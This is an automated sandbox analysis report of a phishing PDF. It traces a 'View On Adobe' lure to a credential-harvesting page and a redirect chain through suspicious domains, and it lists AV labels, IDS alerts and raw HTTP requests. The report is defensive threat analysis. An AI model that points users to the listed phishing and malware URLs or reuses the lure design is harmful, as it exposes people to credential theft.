Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AZfDGVWF68.pdf

Overview

General Information

Sample name:AZfDGVWF68.pdf
renamed because original name is a hash value
Original sample name:b24c416e0247cf131d4e8b634c712612bf35d0ee13fca05c62ff0534d273da28.pdf
Analysis ID:1584735
MD5:85ae7a9c76612dfad87fc1cac7259714
SHA1:b6030d827cc3ee50badc1b24d908bea488c5f673
SHA256:b24c416e0247cf131d4e8b634c712612bf35d0ee13fca05c62ff0534d273da28
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected clear text password fields (password is not hidden)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7068 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\AZfDGVWF68.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 5596 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7208 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1556,i,2814437525766773916,2514006706851234816,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 8104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1972,i,17501448836344422679,2360784714452452957,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T12:09:11.150786+010020221121Exploit Kit Activity Detected192.168.2.45004951.68.82.147443TCP
2025-01-06T12:09:11.401249+010020221121Exploit Kit Activity Detected192.168.2.45004851.68.82.147443TCP
2025-01-06T12:09:12.641960+010020221121Exploit Kit Activity Detected192.168.2.450052188.114.96.3443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://bohlepropiedades.com/Avira URL Cloud: Label: phishing
Source: https://bohlepropiedades.com/favicon.icoAvira URL Cloud: Label: phishing
Source: https://bohlepropiedades.com/includes/contact.phpAvira URL Cloud: Label: phishing
Source: https://bohlepropiedades.com/includes/sse.phpAvira URL Cloud: Label: phishing
Source: https://bohlepropiedades.com/includes/assets/index-qoqlwAed.jsAvira URL Cloud: Label: phishing
Source: https://bohlepropiedades.com/includes/3z6r2I6C42020JAvira URL Cloud: Label: phishing
Source: https://bohlepropiedades.com/includes/assets/index-B_awNbnU.cssAvira URL Cloud: Label: phishing
Source: https://forspearowor.com/sync-doAvira URL Cloud: Label: malware

Phishing

barindex
Source: PDF documentJoe Sandbox AI: Page contains button: 'View On Adobe' Source: 'PDF document'
Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'view on adobe'
Source: 1.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://azz.underbellymeet.asia/?utm_term=74567579... The script exhibits high-risk behavior by redirecting the user to a suspicious domain after a 4-second delay, which is a common tactic used in malicious scripts. The URL contains obfuscated parameters, further indicating potential malicious intent.
Source: 1.17.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wungoangeredsa.com/finance-survey/272/?sva... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some contextual factors like the use of analytics-related functionality may suggest legitimate intent, the overall aggressive and suspicious nature of the script warrants a high-risk score.
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.umbrellaland.fit/?sl=5879905-0031c&pub... The script demonstrates several high-risk behaviors, including data exfiltration, redirects to a suspicious domain, and obfuscated code. While some of the behaviors may be related to legitimate analytics or device detection, the overall risk is elevated due to the lack of transparency and the potential for abuse.
Source: 1.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://azz.underbellymeet.asia/?utm_term=74567579... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of history manipulation, hash changes, and click event handling to redirect users to potentially malicious URLs is highly suspicious and indicative of malicious intent. The obfuscated URLs and query parameters further increase the risk score. Overall, this script demonstrates a clear attempt to engage in malicious activities and should be considered a high-risk threat.
Source: 1.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://azz.underbellymeet.asia/?1=173475&utm_medi... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of obfuscated URLs and the redirection to an unknown domain 'azz.underbellymeet.asia' are strong indicators of malicious intent. Additionally, the script appears to be collecting sensitive information like the user's platform via the 'navigator.platform' API. Overall, this script poses a significant security risk and should be treated with caution.
Source: 1.11.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wungoangeredsa.com/finance-survey/272/?sva... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the script's functionality may be legitimate (e.g., analytics or telemetry), the overall risk level is elevated due to the presence of these concerning indicators.
Source: 1.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://azz.underbellymeet.asia/?utm_term=74567579... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script uses the `eval` function to execute remote code, sends user data to an unknown domain, and redirects the user to a potentially malicious website. Additionally, the script uses obfuscated code and URLs, further increasing the risk. Overall, this script demonstrates a high level of malicious intent and should be considered a significant security threat.
Source: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=HTTP Parser: <input type="text"... for password input
Source: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=HTTP Parser: Number of links: 0
Source: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=HTTP Parser: Base64 decoded: <svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M14.5 2.5h-13A.5.5 0 0 0 1 3v10a.5.5 0 0 0 .5.5h13a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5zM5.281 4.75a1 1 0 0 1 0 2 1 1 0 0 1 0-2zm8.03 6.83a.127.127 0 0 1-.081.03H2....
Source: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=HTTP Parser: Title: Home does not match URL
Source: https://wungoangeredsa.com/finance-survey/272?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3HTTP Parser: No favicon
Source: https://wungoangeredsa.com/finance-survey/272?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3HTTP Parser: No favicon
Source: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=HTTP Parser: No <meta name="author".. found
Source: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=HTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.4:49760 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.umbrellaland.fit to https://www.terrificstrands.digital/click?offer_id=31275&pub_id=173475&pub_sub_sub_id=9&unique1=5879905-0031c&app=opt&app_store_id=ncd&pub_click_id={external_id_from_traffic_source}&site={subid}&pub_sub_id={sub_subid}
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.terrificstrands.digital to https://azz.underbellymeet.asia/?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=bi0jftmaaaguo0315qaaeisaaqwjaaaaaaaaaaauaaabn2y
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: juvuthoors.com to https://wungoangeredsa.com/finance-survey/272/?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=m7456757949717807127&rdk=rk3
Source: Joe Sandbox ViewIP Address: 151.101.130.217 151.101.130.217
Source: Joe Sandbox ViewIP Address: 37.48.68.71 37.48.68.71
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:50052 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:50048 -> 51.68.82.147:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:50049 -> 51.68.82.147:443
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /M3o2cjJJNkM0MjAyMEo= HTTP/1.1Host: bohlepropiedades.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /includes/3z6r2I6C42020J HTTP/1.1Host: bohlepropiedades.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: frameReferer: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /includes/assets/index-B_awNbnU.css HTTP/1.1Host: bohlepropiedades.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bohlepropiedades.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://bohlepropiedades.com/includes/3z6r2I6C42020JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /includes/assets/index-qoqlwAed.js HTTP/1.1Host: bohlepropiedades.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bohlepropiedades.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bohlepropiedades.com/includes/3z6r2I6C42020JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bohlepropiedades.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /includes/assets/index-qoqlwAed.js HTTP/1.1Host: bohlepropiedades.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bohlepropiedades.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /includes/sse.php HTTP/1.1Host: bohlepropiedades.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /includes/contact.php HTTP/1.1Host: bohlepropiedades.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID} HTTP/1.1Host: www.umbrellaland.fitConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://bohlepropiedades.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}&eyeg=945fb352f49cc318c0f7cbe195bc5eb5&eyer=0.4049684939698268&eyei=0&eyew=1280&eyeh=907&eyetd=210&eyef=bohlepropiedades.com HTTP/1.1Host: www.umbrellaland.fitConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /click?offer_id=31275&pub_id=173475&pub_sub_sub_id=9&unique1=5879905-0031c&app=opt&app_store_id=ncd&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID} HTTP/1.1Host: www.terrificstrands.digitalConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=Bi0jftMAAAGUO0315QAAeisAAqWjAAAAAAAAAAAUAAABN2Y HTTP/1.1Host: azz.underbellymeet.asiaConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?utm_term=7456757949717807127&tid=57696e3332 HTTP/1.1Host: azz.underbellymeet.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://azz.underbellymeet.asia/?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=Bi0jftMAAAGUO0315QAAeisAAqWjAAAAAAAAAAAUAAABN2YAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: azz.underbellymeet.asiaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0sec-ch-ua-model: ""User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://azz.underbellymeet.asia/?utm_term=7456757949717807127&tid=57696e3332Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sw.js?v=1736161752722 HTTP/1.1Host: azz.underbellymeet.asiaConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://azz.underbellymeet.asia/?utm_term=7456757949717807127&tid=57696e3332User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: azz.underbellymeet.asiaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nwtrck?var_3=M7456757949717807127&ymid=2de718&var=615-538bd0d9&z=8645117 HTTP/1.1Host: juvuthoors.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://azz.underbellymeet.asia/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /finance-survey/272/?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3 HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/0bc0cde260d08b97.css HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3cacc58ea516fe6f-1736072686539.4d666b3ce7dcd66f.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
